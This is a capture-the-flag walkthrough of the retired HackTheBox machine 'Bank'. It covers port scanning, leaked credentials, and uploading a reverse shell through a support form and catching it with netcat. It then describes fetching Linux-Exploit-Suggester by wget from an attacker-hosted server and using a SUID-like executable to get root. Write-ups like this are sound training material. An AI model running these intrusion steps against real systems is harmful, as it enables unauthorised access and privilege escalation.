Bank Walkthrough

Hey folks, we are back again with one of HackTheBox retired machines โ€œBankโ€, before we talk about it letโ€™s take a look at its info

Letโ€™s get startedโ€ฆ

Nmap Scan

We usually start our scan with nmap scan to discover all open ports, service running, OS detection, etc

nmap -A -T4 -oG bank.gnmap 10.10.10.29

We have 3 open ports ssh/dns/http

Iโ€™ve tried to brute-force ssh credentials and search for vhosts or zone transfer but it fails so letโ€™s go to the next step, nothing important here

Web Enumeration

If you try to open 10.10.10.29:80 you will get the default page of the server

But if you try echo "10.10.10.29 bank.htb" > /etc/hosts and search for http://bank.htb you will get a different page โ€˜Login portalโ€™ and by using this plugin I know that it redirects me to an unknown page before getting the login portal.

Letโ€™s start to discover the hidden directories by using dirbuster/gobuster/ffuf/dirsearch

You will get more of a bunch of directories which is open and available.

After discovering them, Iโ€™ve big data in the last one /balance_transfer

Note that all these files have the same size, but thereโ€™s one has a different size, so we will open it first

Good, we found credentials, letโ€™s use them to login to the login portal

Here we go! Nice design :)

User Flag

After discovering the whole account, I found an upload function on bank.htb/support and then we grabbed a reverse shell from here and then uploaded it

The next step is to open nc as a listener on the port which I insert to the shell code nc -lvp <port> and then access the shell form the website

Nice, weโ€™re in the server now but unfortunately in the user priv not root so letโ€™s grab the user.txt first and then try to be root

/home/chris

Root Flag

Itโ€™s time now to grab the root.txt. Iโ€™ve used Linux-Exploit-Suggester to know which vulnerabilities the machine is affected by downloading it on the attack machine and then transferring it to the vulnerable machine

Iโ€™ve used python -m SimpleHTTPServer 80 to make the attacker machine act as a server, and then go to /tmp the directory in the vulnerable machine to have permission to write there and then downloaded wget http://<attacker-machine-ip>/<file-name> and it was downloaded. Letโ€™s execute it

We have 4 vulnerabilities that works on this machine but unfortunately, thereโ€™s no one of them works with me, so Iโ€™ll try to discover all directories to find any juicy file which gave me a root access

After minutes, I found this directory /var/htb

And have this executable file

As you can see Iโ€™ve tried to execute it, but itโ€™s failed so I execute it from the bin directory, and itโ€™s worked as you can see โค

PreviousNetmon WalkthroughNextGranny Walkthrough

Last updated